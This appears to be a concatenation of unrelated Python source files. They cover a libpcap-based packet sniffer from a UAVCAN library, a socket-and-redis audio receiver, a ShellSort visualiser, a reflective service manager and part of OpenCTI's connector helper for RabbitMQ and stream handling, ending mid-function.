def is_stable(self) -> bool:
"""
True if all devices detected during the initial configuration are still being captured from.
If at least one of them failed (e.g., due to a system reconfiguration), this value would be false.
"""
assert len(self._workers) > 0
return all(x.is_alive() for x in self._workers)
def close(self) -> None:
"""
After closing the callback reference is immediately destroyed to prevent the receiver from being kept alive
by the not-yet-terminated worker threads and to prevent residual packets from generating spurious events.
"""
self._keep_going = False
self._callback = lambda *_: None
# This is not a great solution, honestly. Consider improving it later.
# Currently we just unbind the callback from the user-supplied destination and mark that the threads should
# terminate. The sniffer is then left in a locked-in state, where it may keep performing some no-longer-useful
# activities in the background, but they remain invisible to the outside world. Eventually, the instance will
# be disposed after the last worker is terminated, but we should make it more deterministic.
def _thread_worker(self, name: str, pd: object, decoder: LinkLayerPacket.Decoder) -> None:
import libpcap as pcap
assert isinstance(pd, ctypes.POINTER(pcap.pcap_t))
try:
_logger.debug("%r: Worker thread for %r is started: %s", self, name, threading.current_thread())
# noinspection PyTypeChecker
@pcap.pcap_handler # type: ignore
def proxy(_: object, header: ctypes.Structure, packet: typing.Any) -> None:
# Parse the header, extract the timestamp and the packet length.
header = header.contents
ts_ns = (header.ts.tv_sec * 1_000_000 + header.ts.tv_usec) * 1000
ts = Timestamp(system_ns=ts_ns, monotonic_ns=time.monotonic_ns())
length, real_length = header.caplen, header.len
_logger.debug("%r: CAPTURED PACKET ts=%s dev=%r len=%d bytes", self, ts, name, length)
if real_length != length:
# In theory, this should never occur because we use a huge capture buffer.
# On Windows, however, when using Npcap v0.96, the captured length is (always?) reported to be
# 32 bytes shorter than the real length, despite the fact that the packet is not truncated.
_logger.debug(
"%r: Length mismatch in a packet captured from %r: real %r bytes, captured %r bytes",
self,
name,
real_length,
length,
)
# Create a copy of the payload. This is required per the libpcap API contract -- it says that the
# memory is invalidated upon return from the callback.
packet = memoryview(ctypes.cast(packet, ctypes.POINTER(ctypes.c_ubyte * length))[0]).tobytes()
llp = decoder(memoryview(packet))
if llp is None:
if _logger.isEnabledFor(logging.INFO):
_logger.info(
"%r: Link-layer packet of %d bytes captured from %r at %s could not be parsed. "
"The header is: %s",
self,
len(packet),
name,
ts,
packet[:32].hex(),
)
else:
self._callback(LinkLayerCapture(timestamp=ts, packet=llp, device_name=name))
packets_per_batch = 100
while self._keep_going:
err = pcap.dispatch(pd, packets_per_batch, proxy, ctypes.POINTER(ctypes.c_ubyte)())
if err < 0: # Negative values represent errors, otherwise it's the number of packets processed.
if self._keep_going:
_logger.critical(
"%r: Worker thread for %r has failed with error %s; %s",
self,
name,
err,
pcap.geterr(pd).decode(),
)
else:
_logger.debug(
"%r: Error %r in worker thread for %r ignored because it is commanded to stop",
self,
err,
name,
)
break
except Exception as ex:
_logger.exception("%r: Unhandled exception in worker thread for %r; stopping: %r", self, name, ex)
finally:
# BEWARE: pcap_close() is not idempotent! Second close causes a heap corruption. *sigh*
pcap.close(pd)
_logger.debug("%r: Worker thread for %r is being terminated", self, name)
def __repr__(self) -> str:
return pyuavcan.util.repr_attributes(
self,
filter_expression=repr(self._filter_expr),
num_devices=len(self._workers),
num_devices_active=len(list(x.is_alive() for x in self._workers)),
)
def _find_devices() -> typing.List[str]:
"""
Returns a list of local network devices that can be captured from.
Raises a PermissionError if the user is suspected to lack the privileges necessary for capture.
We used to filter the devices by address family, but it turned out to be a dysfunctional solution because
a device does not necessarily have to have an address in a particular family to be able to capture packets
of that kind. For instance, on Windows, a virtual network adapter may have no addresses while still being
able to capture packets.
"""
import libpcap as pcap
err_buf = ctypes.create_string_buffer(pcap.PCAP_ERRBUF_SIZE)
devices = ctypes.POINTER(pcap.pcap_if_t)()
if pcap.findalldevs(ctypes.byref(devices), err_buf) != 0:
raise LinkLayerError(f"Could not list network devices: {err_buf.value.decode()}")
if not devices:
# This may seem odd, but libpcap returns an empty list if the user is not allowed to perform capture.
# This is documented in the API docs as follows:
# Note that there may be network devices that cannot be opened by the process calling pcap_findalldevs(),
# because, for example, that process does not have sufficient privileges to open them for capturing;
# if so, those devices will not appear on the list.
raise PermissionError("No capturable devices have been found. Do you have the required privileges?")
dev_names: typing.List[str] = []
d = typing.cast(ctypes.Structure, devices)
while d:
d = d.contents
name = d.name.decode()
if name != "any":
dev_names.append(name)
else:
_logger.debug("Synthetic device %r does not support promiscuous mode, skipping", name)
d = d.next
pcap.freealldevs(devices)
return dev_names
def _capture_all(
device_names: typing.List[str], filter_expression: str
) -> typing.List[typing.Tuple[str, object, LinkLayerPacket.Decoder]]:
"""
Begin capture on all devices in promiscuous mode.
We can't use "any" because libpcap does not support promiscuous mode with it, as stated in the docs and here:
https://github.com/the-tcpdump-group/libpcap/blob/bcca74d2713dc9c0a27992102c469f77bdd8dd1f/pcap-linux.c#L2522.
It shouldn't be a problem because we have our filter expression that is expected to be highly efficient.
Devices whose ifaces are down or that are not usable for other valid reasons will be silently filtered out here.
"""
import libpcap as pcap
codecs = LinkLayerPacket.get_codecs()
caps: typing.List[typing.Tuple[str, object, LinkLayerPacket.Decoder]] = []
try:
for name in device_names:
pd = _capture_single_device(name, filter_expression, list(codecs.keys()))
if pd is None:
_logger.info("Could not set up capture on %r", name)
continue
data_link_type = pcap.datalink(pd)
try:
_, dec = codecs[data_link_type]
except LookupError:
# This is where we filter out devices that certainly have no relevance, like CAN adapters.
pcap.close(pd)
_logger.info(
"Device %r will not be used for packet capture because its data link layer type=%r "
"is not supported by this library. Either the device is irrelevant, "
"or the library needs to be extended to support this link layer protocol.",
name,
data_link_type,
)
else:
caps.append((name, pd, dec))
except Exception:
for _, c, _ in caps:
pcap.close(c)
raise
_logger.info(
"Capture sessions with filter %r have been set up on: %s", filter_expression, list(n for n, _, _ in caps)
)
return caps
def _capture_single_device(
device: str, filter_expression: str, data_link_hints: typing.Sequence[int]
) -> typing.Optional[object]:
"""
Returns None if the interface managed by this device is not up or if it cannot be captured from for other reasons.
On GNU/Linux, some virtual devices (like netfilter devices) can only be accessed by a superuser.
The function will configure libpcap to use the first supported data link type from the list.
If none of the specified data link types are supported, a log message is emitted but no error is raised.
The available link types are listed in https://www.tcpdump.org/linktypes.html.
"""
import libpcap as pcap
def status_to_str(error_code: int) -> str:
"""
Some libpcap-compatible libraries (e.g., WinPCap) do not have this function, so we have to define a fallback.
"""
try:
return str(pcap.statustostr(error_code).decode())
except AttributeError: # pragma: no cover
return f"[error {error_code}]"
# This is helpful: https://github.com/karpierz/libpcap/blob/master/tests/capturetest.py
err_buf = ctypes.create_string_buffer(pcap.PCAP_ERRBUF_SIZE)
pd = pcap.create(device.encode(), err_buf)
if pd is None:
raise LinkLayerCaptureError(f"Could not instantiate pcap_t for {device!r}: {err_buf.value.decode()}")
try:
# Non-fatal errors are intentionally logged at a low severity level to not disturb the user unnecessarily.
err = pcap.set_snaplen(pd, _SNAPSHOT_LENGTH)
if err != 0:
_logger.info("Could not set snapshot length for %r: %r", device, status_to_str(err))
err = pcap.set_timeout(pd, int(_BUFFER_TIMEOUT * 1e3))
if err != 0:
_logger.info("Could not set timeout for %r: %r", device, status_to_str(err))
err = pcap.set_promisc(pd, 1)
if err != 0:
_logger.info("Could not enable promiscuous mode for %r: %r", device, status_to_str(err))
err = pcap.activate(pd)
if err in (pcap.PCAP_ERROR_PERM_DENIED, pcap.PCAP_ERROR_PROMISC_PERM_DENIED):
raise PermissionError(f"Capture is not permitted on {device!r}: {status_to_str(err)}")
if err == pcap.PCAP_ERROR_IFACE_NOT_UP:
_logger.debug("Device %r is not capturable because the iface is not up. %s", device, status_to_str(err))
pcap.close(pd)
return None
if err < 0:
_logger.info(
"Could not activate capture on %r: %s; %s", device, status_to_str(err), pcap.geterr(pd).decode()
)
pcap.close(pd)
return None
if err > 0:
_logger.info(
"Capture on %r started successfully, but libpcap reported a warning: %s", device, status_to_str(err)
)
# https://www.tcpdump.org/manpages/pcap_set_datalink.3pcap.html
for dlt in data_link_hints:
err = pcap.set_datalink(pd, dlt)
if err == 0:
_logger.debug("Device %r is configured to use the data link type %r", device, dlt)
break
else:
_logger.debug(
"Device %r supports none of the following data link types: %r. Last error was: %s",
device,
list(data_link_hints),
pcap.geterr(pd).decode(),
)
# https://www.tcpdump.org/manpages/pcap_compile.3pcap.html
code = pcap.bpf_program() # This memory needs to be freed when closed. Fix it later.
err = pcap.compile(pd, ctypes.byref(code), filter_expression.encode(), 1, pcap.PCAP_NETMASK_UNKNOWN)
if err != 0:
raise LinkLayerCaptureError(
f"Could not compile filter expression {filter_expression!r}: {status_to_str(err)}; "
f"{pcap.geterr(pd).decode()}"
)
err = pcap.setfilter(pd, ctypes.byref(code))
if err != 0:
raise LinkLayerCaptureError(f"Could not install filter: {status_to_str(err)}; {pcap.geterr(pd).decode()}")
except Exception:
pcap.close(pd)
raise
return typing.cast(object, pd)
_SNAPSHOT_LENGTH = 65535
"""
The doc says: "A snapshot length of 65535 should be sufficient, on most if not all networks,
to capture all the data available from the packet."
"""
_BUFFER_TIMEOUT = 0.005
"""
See "packet buffer timeout" in https://www.tcpdump.org/manpages/pcap.3pcap.html.
This value should be sensible for any kind of real-time monitoring application.
"""
def _apply_windows_workarounds() -> None: # pragma: no cover
import os
import pathlib
import importlib.util
# This is a Windows Server-specific workaround for this libpcap issue: https://github.com/karpierz/libpcap/issues/7
# tl;dr: It works on desktop Windows 8/10, but Windows Server 2019 is unable to find "wpcap.dll" unless the
# DLL search path is specified manually via PATH. The workaround is valid per libpcap==1.10.0b15.
# Later versions of libpcap may not require it, so please consider removing it in the future.
spec = importlib.util.find_spec("libpcap")
if spec and spec.origin:
is_64_bit = sys.maxsize.bit_length() > 32
libpcap_dir = pathlib.Path(spec.origin).parent
dll_path = libpcap_dir / "_platform" / "_windows" / ("x64" if is_64_bit else "x86") / "wpcap"
os.environ["PATH"] += os.pathsep + str(dll_path)
if sys.platform.startswith("win"): # pragma: no cover
_apply_windows_workarounds()
|
receive_audio.py
|
from root import *
import pyaudio
import time
import redis
# Audio info
CHUNK = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 16000
SILENCE = chr(0)*CHUNK*2
# Buffers and locks
audio_buffer = b""
audio_buffer_lock = threading.Lock()
# Connection info
parallel_connections = 10
def new_connection(ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # TCP socket
port = 12346
s.connect((ip, port))
return s
def receive_audio(s: socket.socket, r):
audio_data = s.recv(CHUNK)
while 1: # audio_data != "": # todo check which condition is better for the while loop
global audio_buffer
try:
audio_data = s.recv(CHUNK)
audio_buffer_lock.acquire()
audio_buffer += audio_data
audio_buffer_lock.release()
except socket.error:
print("Audio receiver : Server disconnected.")
break
status = r.get("status").decode("utf-8")
if status != "call":
s.shutdown(socket.SHUT_RDWR)
s.close()
break
class ReceiveAudioFrameThread(threading.Thread):
def __init__(self, thread_id, name, counter, correspondent_ip, r: redis.Redis):
threading.Thread.__init__(self)
self.threadID = thread_id
self.name = name
self.counter = counter
self.correspondent_ip = correspondent_ip
self.r = r
def run(self) -> None:
threads = []
for i in range(parallel_connections):
s = new_connection(self.correspondent_ip)
new_thread = threading.Thread(target=receive_audio, args=(s, self.r, ))
new_thread.start()
threads.append(new_thread)
for th in threads:
th.join()
print('Audio receiver : Connection established for audio.')
print("Exiting audio receiving thread.")
class PlayAudioThread(threading.Thread):
def __init__(self, thread_id, name, counter, r: redis.Redis):
threading.Thread.__init__(self)
self.threadID = thread_id
self.name = name
self.counter = counter
self.r = r
def run(self) -> None:
p = pyaudio.PyAudio() # todo fix the bug with this shit (only happens when not using localhost)
print("Audio player : Audio device opened.")
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
output=True,
frames_per_buffer=CHUNK)
print("Audio player : Audio stream opened.")
stream.start_stream()
print("Audio player : Audio stream started.")
last_chunk = None
while True:
global audio_buffer
# In case audio is off
show_audio = self.r.get("show_audio").decode("utf-8")
if show_audio == "FALSE":
stream.write(SILENCE)
audio_buffer_lock.acquire()
audio_buffer = []
audio_buffer_lock.release()
time.sleep(CHUNK / RATE * 0.5)
continue
free = stream.get_write_available()
chunks = int(math.ceil(free/CHUNK))
if len(audio_buffer) >= chunks*CHUNK:
audio_buffer_lock.acquire()
last_chunk = audio_buffer[:chunks*CHUNK]
stream.write(audio_buffer[:chunks*CHUNK])
audio_buffer = audio_buffer[CHUNK*chunks:]
audio_buffer_lock.release()
elif len(audio_buffer) >= CHUNK:
chunks = len(audio_buffer)//CHUNK
audio_buffer_lock.acquire()
last_chunk = audio_buffer[:chunks * CHUNK]
stream.write(audio_buffer[:chunks * CHUNK])
audio_buffer = audio_buffer[CHUNK * chunks:]
audio_buffer_lock.release()
elif last_chunk is not None:
stream.write(last_chunk)
# else:
# # We write silence
# stream.write(SILENCE)
# time.sleep(CHUNK/RATE)
# Just for debugging (to see if we are having under runs)
# else:
# print("Audio player : Buffer under-run (len of buffer < chunk * 10).")
stream.stop_stream()
stream.close()
p.terminate()
print("Audio playing thread terminated.")
|
ShellSort.py
|
from Algorithims import Algorithms
import time
import threading
class ShellSort(Algorithms):
def __init__(self, data, delay):
Algorithms.__init__(self)
self.data = data
self.delay = delay
sorting_thread = threading.Thread(target=self.sort, args=(self.data, self.drawData, self.delay))
sorting_thread.daemon = True
sorting_thread.start()
self.mainloop()
def sort(self, data, drawData, delay):
n = len(data)
gap = n // 2
while gap > 0:
for i in range(gap, n):
temp = data[i]
j = i
while j >= gap and data[j - gap] > temp:
data[j] = data[j - gap]
drawData(data, ["red" if x == j or x == j - gap else "white" for x in range(len(data))])
time.sleep(delay)
j -= gap
data[j] = temp
drawData(data, ["red" if x == j or x == i - gap else "white" for x in range(len(data))])
time.sleep(delay)
gap //= 2
drawData(data, ["green" for x in range(len(data))])
|
ServiceManager.py
|
import threading
import importlib
from core.Service import Service
class ServiceManager:
def __init__(self, core, config):
self.core = core
self.services = {}
self.readConfigFile(config)
def readConfigFile(self, config):
for sectionName in config.sections():
indexOfLastPoint = sectionName.rfind('.')
indexOfEqual = sectionName.rfind('=')
serviceId = sectionName[0:indexOfEqual]
moduleName = sectionName[indexOfEqual + 1:indexOfLastPoint]
className = sectionName[indexOfLastPoint + 1:len(sectionName)]
self.instantiateService(moduleName, className, serviceId)
def instantiateService(self, module_name, class_name, service_id):
self.core.logger.log("Instantiating Module: " + module_name + ", Class: " + class_name + ", ID: " + service_id)
reflectedModule = importlib.import_module(module_name)
reflectedClass = getattr(reflectedModule, class_name)
serviceInstance = reflectedClass()
self.addService(serviceInstance, service_id)
def addService(self, service, service_id):
if not issubclass(type(service), Service):
raise Exception('Class \'' + type(service).__name__ + '\' does not extend from \'' + type(service).__name__ + '\'')
elif service_id in self.services:
raise Exception('Service ID ' + service + ' already exists.')
service.core = self.core
service.id = service_id
self.services[service_id] = service
def initializeServices(self):
for service in self.services.values():
initservicethread = threading.Thread(target=service.initialize)
initservicethread.start()
def startServices(self):
for service in self.services.values():
startservicethread = threading.Thread(target=service.start)
startservicethread.start()
|
opencti_connector_helper.py
|
import base64
import datetime
import json
import logging
import os
import ssl
import sys
import threading
import time
import uuid
from typing import Callable, Dict, List, Optional, Union
import pika
from pika.exceptions import NackError, UnroutableError
from sseclient import SSEClient
from pycti.api.opencti_api_client import OpenCTIApiClient
from pycti.connector.opencti_connector import OpenCTIConnector
from pycti.utils.opencti_stix2_splitter import OpenCTIStix2Splitter
TRUTHY: List[str] = ["yes", "true", "True"]
FALSY: List[str] = ["no", "false", "False"]
def get_config_variable(
env_var: str,
yaml_path: List,
config: Dict = {},
isNumber: Optional[bool] = False,
default=None,
) -> Union[bool, int, None, str]:
"""[summary]
:param env_var: environnement variable name
:param yaml_path: path to yaml config
:param config: client config dict, defaults to {}
:param isNumber: specify if the variable is a number, defaults to False
"""
if os.getenv(env_var) is not None:
result = os.getenv(env_var)
elif yaml_path is not None:
if yaml_path[0] in config and yaml_path[1] in config[yaml_path[0]]:
result = config[yaml_path[0]][yaml_path[1]]
else:
return default
else:
return default
if result in TRUTHY:
return True
if result in FALSY:
return False
if isNumber:
return int(result)
return result
def create_ssl_context() -> ssl.SSLContext:
"""Set strong SSL defaults: require TLSv1.2+
`ssl` uses bitwise operations to specify context `<enum 'Options'>`
"""
ssl_context_options: List[int] = [
ssl.OP_NO_COMPRESSION,
ssl.OP_NO_TICKET, # pylint: disable=no-member
ssl.OP_NO_RENEGOTIATION, # pylint: disable=no-member
ssl.OP_SINGLE_DH_USE,
ssl.OP_SINGLE_ECDH_USE,
]
ssl_context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH)
ssl_context.options &= ~ssl.OP_ENABLE_MIDDLEBOX_COMPAT # pylint: disable=no-member
ssl_context.verify_mode = ssl.CERT_REQUIRED
ssl_context.minimum_version = ssl.TLSVersion.TLSv1_2
for option in ssl_context_options:
ssl_context.options |= option
return ssl_context
class ListenQueue(threading.Thread):
"""Main class for the ListenQueue used in OpenCTIConnectorHelper
:param helper: instance of a `OpenCTIConnectorHelper` class
:type helper: OpenCTIConnectorHelper
:param config: dict containing client config
:type config: Dict
:param callback: callback function to process queue
:type callback: callable
"""
def __init__(self, helper, config: Dict, callback) -> None:
threading.Thread.__init__(self)
self.pika_credentials = None
self.pika_parameters = None
self.pika_connection = None
self.channel = None
self.helper = helper
self.callback = callback
self.host = config["connection"]["host"]
self.use_ssl = config["connection"]["use_ssl"]
self.port = config["connection"]["port"]
self.user = config["connection"]["user"]
self.password = config["connection"]["pass"]
self.queue_name = config["listen"]
self.exit_event = threading.Event()
self.thread = None
# noinspection PyUnusedLocal
def _process_message(self, channel, method, properties, body) -> None:
"""process a message from the rabbit queue
:param channel: channel instance
:type channel: callable
:param method: message methods
:type method: callable
:param properties: unused
:type properties: str
:param body: message body (data)
:type body: str or bytes or bytearray
"""
json_data = json.loads(body)
self.thread = threading.Thread(target=self._data_handler, args=[json_data])
self.thread.start()
while self.thread.is_alive(): # Loop while the thread is processing
assert self.pika_connection is not None
self.pika_connection.sleep(1.0)
logging.info(
"%s",
(
f"Message (delivery_tag={method.delivery_tag}) processed"
", thread terminated"
),
)
channel.basic_ack(delivery_tag=method.delivery_tag)
def _data_handler(self, json_data) -> None:
# Set the API headers
work_id = json_data["internal"]["work_id"]
applicant_id = json_data["internal"]["applicant_id"]
self.helper.work_id = work_id
if applicant_id is not None:
self.helper.applicant_id = applicant_id
self.helper.api.set_applicant_id_header(applicant_id)
# Execute the callback
try:
self.helper.api.work.to_received(
work_id, "Connector ready to process the operation"
)
message = self.callback(json_data["event"])
self.helper.api.work.to_processed(work_id, message)
except Exception as e: # pylint: disable=broad-except
logging.exception("Error in message processing, reporting error to API")
try:
self.helper.api.work.to_processed(work_id, str(e), True)
except: # pylint: disable=bare-except
logging.error("Failing reporting the processing")
def run(self) -> None:
while not self.exit_event.is_set():
try:
# Connect the broker
self.pika_credentials = pika.PlainCredentials(self.user, self.password)
self.pika_parameters = pika.ConnectionParameters(
host=self.host,
port=self.port,
virtual_host="/",
credentials=self.pika_credentials,
ssl_options=pika.SSLOptions(create_ssl_context(), self.host)
if self.use_ssl
else None,
)
self.pika_connection = pika.BlockingConnection(self.pika_parameters)
self.channel = self.pika_connection.channel()
assert self.channel is not None
self.channel.basic_consume(
queue=self.queue_name, on_message_callback=self._process_message
)
self.channel.start_consuming()
except (KeyboardInterrupt, SystemExit):
self.helper.log_info("Connector stop")
sys.exit(0)
except Exception as e: # pylint: disable=broad-except
self.helper.log_error(str(e))
time.sleep(10)
def stop(self):
self.exit_event.set()
if self.thread:
self.thread.join()
class PingAlive(threading.Thread):
def __init__(self, connector_id, api, get_state, set_state) -> None:
threading.Thread.__init__(self)
self.connector_id = connector_id
self.in_error = False
self.api = api
self.get_state = get_state
self.set_state = set_state
self.exit_event = threading.Event()
def ping(self) -> None:
while not self.exit_event.is_set():
try:
initial_state = self.get_state()
result = self.api.connector.ping(self.connector_id, initial_state)
remote_state = (
json.loads(result["connector_state"])
if result["connector_state"] is not None
and len(result["connector_state"]) > 0
else None
)
if initial_state != remote_state:
self.set_state(result["connector_state"])
logging.info(
"%s",
(
"Connector state has been remotely reset to: "
f'"{self.get_state()}"'
),
)
if self.in_error:
self.in_error = False
logging.error("API Ping back to normal")
except Exception: # pylint: disable=broad-except
self.in_error = True
logging.error("Error pinging the API")
self.exit_event.wait(40)
def run(self) -> None:
logging.info("Starting ping alive thread")
self.ping()
def stop(self) -> None:
logging.info("Preparing for clean shutdown")
self.exit_event.set()
class ListenStream(threading.Thread):
def __init__(
self, helper, callback, url, token, verify_ssl, start_timestamp, live_stream_id
) -> None:
threading.Thread.__init__(self)
self.helper = helper
self.callback = callback
self.url = url
self.token = token
self.verify_ssl = verify_ssl
self.start_timestamp = start_timestamp
self.live_stream_id = live_stream_id
self.exit = False
def run(self) -> None: # pylint: disable=too-many-branches
current_state = self.helper.get_state()
if current_state is None:
current_state = {
"connectorLastEventId": f"{self.start_timestamp}-0"
if self.start_timestamp is not None and len(self.start_timestamp) > 0
else "-"
}
self.helper.set_state(current_state)
# If URL and token are provided, likely consuming a remote stream
if self.url is not None and self.token is not None:
# If a live stream ID, appending the URL
if self.live_stream_id is not None:
live_stream_uri = f"/{self.live_stream_id}"
elif self.helper.connect_live_stream_id is not None:
live_stream_uri = f"/{self.helper.connect_live_stream_id}"
else:
live_stream_uri = ""
# Live stream "from" should be empty if start from the beginning
if (
self.live_stream_id is not None
or self.helper.connect_live_stream_id is not None
):
live_stream_from = (
f"?from={current_state['connectorLastEventId']}"
if current_state["connectorLastEventId"] != "-"
else ""
)
# Global stream "from" should be 0 if starting from the beginning
else:
live_stream_from = "?from=" + (
current_state["connectorLastEventId"]
if current_state["connectorLastEventId"] != "-"
else "0"
)
live_stream_url = f"{self.url}/stream{live_stream_uri}{live_stream_from}"
opencti_ssl_verify = (
self.verify_ssl if self.verify_ssl is not None else True
)
logging.info(
"%s",
(
"Starting listening stream events (URL: "
f"{live_stream_url}, SSL verify: {opencti_ssl_verify})"
),
)
messages = SSEClient(
live_stream_url,
headers={"authorization": "Bearer " + self.token},
verify=opencti_ssl_verify,
)
else:
live_stream_uri = (
f"/{self.helper.connect_live_stream_id}"
if self.helper.connect_live_stream_id is not None
else ""
)
if self.helper.connect_live_stream_id is not None:
live_stream_from = (
f"?from={current_state['connectorLastEventId']}"
if current_state["connectorLastEventId"] != "-"
else ""
)
# Global stream "from" should be 0 if starting from the beginning
else:
live_stream_from = "?from=" + (
current_state["connectorLastEventId"]
if current_state["connectorLastEventId"] != "-"
else "0"
)
live_stream_url = (
f"{self.helper.opencti_url}/stream{live_stream_uri}{live_stream_from}"
)
logging.info(
"%s",
(
f"Starting listening stream events (URL: {live_stream_url}"
f", SSL verify: {self.helper.opencti_ssl_verify})"
),
)
messages = SSEClient(
live_stream_url,
headers={"authorization": "Bearer " + self.helper.opencti_token},
verify=self.helper.opencti_ssl_verify,
)
# Iter on stream messages
for msg in messages:
if self.exit:
break
if msg.event == "heartbeat" or msg.event == "connected":
continue
if msg.event == "sync":
if msg.id is not None:
state = self.helper.get_state()
state["connectorLastEventId"] = str(msg.id)
self.helper.set_state(state)
else:
self.callback(msg)
if msg.id is not None:
state = self.helper.get_state()
state["connectorLastEventId"] = str(msg.id)
self.helper.set_state(state)
def stop(self):
self.exit = True
class OpenCTIConnectorHelper: # pylint: disable=too-many-public-methods
"""Python API for OpenCTI connector
:param config: dict standard config
:type config: Dict
"""
def __init__(self, config: Dict) -> None:
# Load API config
self.opencti_url = get_config_variable(
"OPENCTI_URL", ["opencti", "url"], config
)
self.opencti_token = get_config_variable(
"OPENCTI_TOKEN", ["opencti", "token"], config
)
self.opencti_ssl_verify = get_config_variable(
"OPENCTI_SSL_VERIFY", ["opencti", "ssl_verify"], config, False, True
)
# Load connector config
self.connect_id = get_config_variable(
"CONNECTOR_ID", ["connector", "id"], config
)
self.connect_type = get_config_variable(
"CONNECTOR_TYPE", ["connector", "type"], config
)
self.connect_live_stream_id = get_config_variable(
"CONNECTOR_LIVE_STREAM_ID",
["connector", "live_stream_id"],
config,
False,
None,
)
self.connect_name = get_config_variable(
"CONNECTOR_NAME", ["connector", "name"], config
)
self.connect_confidence_level = get_config_variable(
"CONNECTOR_CONFIDENCE_LEVEL",
["connector", "confidence_level"],
config,
True,
)
self.connect_scope = get_config_variable(
"CONNECTOR_SCOPE", ["connector", "scope"], config
)
self.connect_auto = get_config_variable(
"CONNECTOR_AUTO", ["connector", "auto"], config, False, False
)
self.connect_only_contextual = get_config_variable(
"CONNECTOR_ONLY_CONTEXTUAL",
["connector", "only_contextual"],
config,
False,
False,
)
self.log_level = get_config_variable(
"CONNECTOR_LOG_LEVEL", ["connector", "log_level"], config
)
self.connect_run_and_terminate = get_config_variable(
"CONNECTOR_RUN_AND_TERMINATE",
["connector", "run_and_terminate"],
config,
False,
False,
)
# Configure logger
numeric_level = getattr(
logging, self.log_level.upper() if self.log_level else "INFO", None
)
if not isinstance(numeric_level, int):
raise ValueError(f"Invalid log level: {self.log_level}")
logging.basicConfig(level=numeric_level)
# Initialize configuration
self.api = OpenCTIApiClient(
self.opencti_url, self.opencti_token, self.log_level
)
# Register the connector in OpenCTI
self.connector = OpenCTIConnector(
self.connect_id,
self.connect_name,
self.connect_type,
self.connect_scope,
self.connect_auto,
self.connect_only_contextual,
)
connector_configuration = self.api.connector.register(self.connector)
logging.info("%s", f"Connector registered with ID: {self.connect_id}")
self.connector_id = connector_configuration["id"]
self.work_id = None
self.applicant_id = connector_configuration["connector_user"]["id"]
self.connector_state = connector_configuration["connector_state"]
self.config = connector_configuration["config"]
# Start ping thread
if not self.connect_run_and_terminate:
self.ping = PingAlive(
self.connector.id, self.api, self.get_state, self.set_state
)
self.ping.start()
# self.listen_stream = None
self.listen_queue = None
def stop(self) -> None:
if self.listen_queue:
self.listen_queue.stop()
# if self.listen_stream:
# self.listen_stream.stop()
self.ping.stop()
self.api.connector.unregister(self.connector_id)
def get_name(self) -> Optional[Union[bool, int, str]]:
return self.connect_name
def get_only_contextual(self) -> Optional[Union[bool, int, str]]:
return self.connect_only_contextual
def set_state(self, state) -> None:
"""sets the connector state
:param state: state object
:type state: Dict
"""
self.connector_state = json.dumps(state)
def get_state(self) -> Optional[Dict]:
"""get the connector state
:return: returns the current state of the connector if there is any
:rtype:
"""
try:
if self.connector_state:
state = json.loads(self.connector_state)
if isinstance(state, Dict) and state:
return state
except: # pylint: disable=bare-except
pass
return None
def listen(self, message_callback: Callable[[Dict], str]) -> None:
"""listen for messages and register callback function
:param message_callback: callback function to process messages
:type message_callback: Callable[[Dict], str]
"""
self.listen_queue = ListenQueue(self, self.config, message_callback)
self.listen_queue.start()
def listen_stream(
self,
message_callback,
url=None,
token=None,
verify_ssl=None,
start_timestamp=None,
live_stream_id=None,
) -> ListenStream:
"""listen for messages and register callback function
:param message_callback: callback function to process messages
"""
self.listen_stream = ListenStream(
self,
message_callback,
url,
token,
verify_ssl,
start_timestamp,
live_stream_id,
)
self.listen_stream.start()
return self.listen_stream
def get_opencti_url(self) -> Optional[Union[bool, int, str]]:
return self.opencti_url
def get_opencti_token(self) -> Optional[Union[bool, int, str]]:
return self.opencti_token
def get_connector(self) -> OpenCTIConnector:
return self.connector
def log_error(self, msg: str) -> None:
logging.error(msg)
def log_info(self, msg: str) -> None:
logging.info(msg)
def log_debug(self, msg: str) -> None:
logging.debug(msg)
def log_warning(self, msg: str) -> None:
logging.warning(msg)
def date_now(self) -> str:
"""get the current date (UTC)
:return: current datetime for utc
:rtype: str
"""
return (
datetime.datetime.utcnow()
.replace(microsecond=0, tzinfo=datetime.timezone.utc)
.isoformat()
)
# Push Stix2 helper
def send_stix2_bundle(self, bundle, **kwargs) -> list:
"""send a stix2 bundle to the API
:param work_id: a valid work id
:param bundle: valid stix2 bundle
:type bundle:
:param entities_types: list of entities, defaults to None
:type entities_types: list, optional
:param update: whether to updated data in the database, defaults to False
:type update: bool, optional
:raises ValueError: if the bundle is empty
:return: list of bundles
:rtype: list
"""
work_id = kwargs.get("work_id", self.work_id)
entities_types = kwargs.get("entities_types", None)
update = kwargs.get("update", False)
event_version = kwargs.get("event_version", None)
if entities_types is None:
entities_types = []
stix2_splitter = OpenCTIStix2Splitter()
bundles = stix2_splitter.split_bundle(bundle, True, event_version)
if len(bundles) == 0:
raise ValueError("Nothing to import")
if work_id is not None:
self.api.work.add_expectations(work_id, len(bundles))
pika_credentials = pika.PlainCredentials(
self.config["connection"]["user"], self.config["connection"]["pass"]
)
pika_parameters = pika.ConnectionParameters(
host=self.config["connection"]["host"],
port=self.config["connection"]["port"],
virtual_host="/",
credentials=pika_credentials,
ssl_options=pika.SSLOptions(
create_ssl_context(), self.config["connection"]["host"]
)
if self.config["connection"]["use_ssl"]
else None,
)
pika_connection = pika.BlockingConnection(pika_parameters)
channel = pika_connection.channel()
for sequence, bundle in enumerate(bundles, start=1):
self._send_bundle(
channel,
bundle,
work_id=work_id,
entities_types=entities_types,
sequence=sequence,
update=update,
)
channel.close()
return bundles
def _send_bundle(self, channel, bundle, **kwargs) -> None:
"""send a STIX2 bundle to RabbitMQ to be consumed by workers
:param channel: RabbitMQ channel
:type channel: callable
:param bundle: valid stix2 bundle
:type bundle:
:param entities_types: list of entity types, defaults to None
:type entities_types: list, optional
:param update: whether to update data in the database, defaults to False
:type update: bool, optional
"""
work_id = kwargs.get("work_id", None)
sequence = kwargs.get("sequence", 0)
update = kwargs.get("update", False)
entities_types = kwargs.get("entities_types", None)
if entities_types is None:
entities_types = []
# Validate the STIX 2 bundle
# validation = validate_string(bundle)
# if not validation.is_valid:
# raise ValueError('The bundle is not a valid STIX2 JSON')
# Prepare the message
# if self.current_work_id is None:
# raise ValueError('The job id must be specified')
message = {
"applicant_id": self.applicant_id,
"action_sequence": sequence,
"entities_types": entities_types,
